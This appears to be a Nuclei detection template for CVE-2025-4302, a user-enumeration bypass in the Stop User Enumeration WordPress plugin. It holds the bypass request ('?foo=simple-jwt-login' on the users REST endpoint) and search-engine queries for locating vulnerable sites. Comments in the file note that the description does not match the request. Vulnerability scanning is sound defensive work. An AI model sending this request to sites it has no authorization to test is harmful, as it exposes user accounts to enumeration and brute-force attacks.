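id: CVE-2025-4302

info:
  name: Stop User Enumeration WordPress plugin - Authentication Bypass
  author: Kazgangap
  severity: medium
  description: |
    Stop User Enumeration WordPress plugin < 1.7.3 contains an authentication bypass caused by URL-encoding the REST API path /wp-json/wp/v2/users/, letting attackers bypass user enumeration restrictions, exploit requires crafted URL encoding.
  impact: |
    Attackers can bypass user enumeration protection through URL-encoding manipulation, potentially facilitating brute force attacks against user accounts.
  remediation: |
    Upgrade Stop User Enumeration WordPress plugin to version 1.7.3 or later that properly handles URL-encoded REST API paths.
  reference:
    - https://wpscan.com/vulnerability/19f67d6e-4ffe-4126-ac42-fb23c5017a3e/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-4302.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4302
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-4302
    epss-score: 0.00847
    epss-percentile: 0.53524
  metadata:
    verified: true
    vendor: fullworks
    product: stop-user-enumeration
    framework: wordpress
    # Quoted: the value contains a ':' followed by '"', which some parsers mishandle as a plain scalar.
    shodan-query: 'http.html:"/wp-content/plugins/stop-user-enumeration/"'
    fofa-query: body=/wp-content/plugins/stop-user-enumeration/
    publicwww-query: "/wp-content/plugins/stop-user-enumeration/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,wpscan,stop-user-enumeration,vuln

# The second request runs only after the first confirms the plugin is actively
# blocking the endpoint; this keeps the positive match from firing on sites that
# simply expose /wp-json/wp/v2/users without the plugin installed.
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users"

    # Precondition (internal, not reported): the plugin's own 401 message is present.
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Only authenticated users can access the User endpoint REST API")'
          - 'status_code==401'
        condition: and
    internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users?foo=simple-jwt-login"
    # NOTE(review): the info block attributes the bypass to URL-encoding of the
    # REST path, but this request relies on a query-string value instead
    # (presumably a compatibility exemption in the plugin's blocking logic).
    # Confirm against the plugin source / references before relying on the wording.

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          # \d+ rather than \d: user IDs are not limited to a single digit, so a
          # first record with id >= 10 would otherwise be missed.
          - '{"id":\d+,"name":".*","url"'

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

# Signature digest carried over from the original template text; it was computed
# over the unmodified body and will need to be regenerated after any edit.
# digest: 4a0a00473045022100b5facdb3c3af7de113249e1b44b159964e3487ea9eb830af524e14492fdaafd8022027a5cf6e1fc3f2c6033b7def054419df1e4914b3bb946870c65a99bd91e31d58:922c64590222798bb761d5b6d8e72950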